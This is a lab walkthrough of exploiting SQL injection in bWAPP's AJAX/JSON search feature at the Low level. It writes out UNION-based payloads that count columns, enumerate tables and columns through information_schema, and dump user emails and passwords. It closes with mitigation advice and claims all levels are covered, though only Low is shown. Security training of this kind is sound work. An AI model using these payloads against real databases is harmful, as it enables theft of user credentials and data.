bWAPP - SQL Injection (AJAX,JSON,jQuery)

bWAPP – SQL Injection (AJAX,JSON,jQuery)

In this walk through, we will be going through the SQL Injection (AJAX,JSON,jQuery) vulnerability section from bWAPP Labs. We will be exploring and exploiting SQL Injection in AJAX, JSON & jQuery implementations and learn how application are affected because of it. So, let’s get started with the Hacking without any delay.

SQL Injection (AJAX,JSON,jQuery)

Table of Contents

Security: Low

  • Setting the security level to Low.

Security level Low

  • The application uses a AJAX search functionality where the the application dynamically shows result as the user types inside the search box.

SQL Injection (AJAX/JSON/jQuery)

  • I used the below payload to see all the movie titles inside the database. We will use the same format to dump all the contents from the Database by using AJAX.

' -- #

Dumping all titles

  • Let’s move ahead a little and dump whole database with emails and passwords of the users in the application. We will start by checking the no. of columns in the database. For that, we used ORDER BY clause, as we can see we hit an “No movies were found” error on column 8 but no error on column 7. That means, there are 7 columns in the DB.

' ORDER BY 8 -- #
' ORDER BY 7 -- #

Order by clause

Order by clause

  • Let’s find out which column can be used to retrieve data. Here, the second data got reflected in the front end.

' UNION SELECT NULL,"asd",NULL,NULL,NULL,NULL,NULL -- #

UNION payload

  • Moving on, let’s dump the database name using the below payload.

' UNION SELECT NULL,database(),NULL,NULL,NULL,NULL,NULL -- #

Enumerating database

  • Now we have our database name “bWAPP”. Let’s find out the tables inside it using the below payload.

' UNION SELECT NULL,table_name,NULL,NULL,NULL,NULL,NULL from information_schema.tables where table_schema=database() -- #

Dumping tables

  • Out of the above dumped table, the “users” tables seems interesting. Let’s dump the no. of columns inside it with the below payload.

' UNION SELECT NULL,column_name,NULL,NULL,NULL,NULL,NULL from information_schema.columns where table_name='users' -- #

Dumping columns

  • Let’s dump email and password with the below payload.

' UNION SELECT NULL,email,password,NULL,NULL,NULL,NULL from users -- #

Dumping username & passwords

Also Read: bWAPP – Session Management (Session ID in URL)

Conclusion:

Conclusion

So, we finally completed all the security levels for the bWAPP SQL Injection (AJAX,JSON,jQuery) Vulnerability. We looked into the various ways how application has been set up in various levels and how we can bypass the security controls implemented. Next, we can mitigate the potential SQL Injection attacks by performing input sanitization and using prepared statements or parametrized queries for every SQL query made by the application to the database. On that note, i will take your leave and will meet you in next one with another bWAPP vulnerability writeup, till then “Keep Hacking”.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top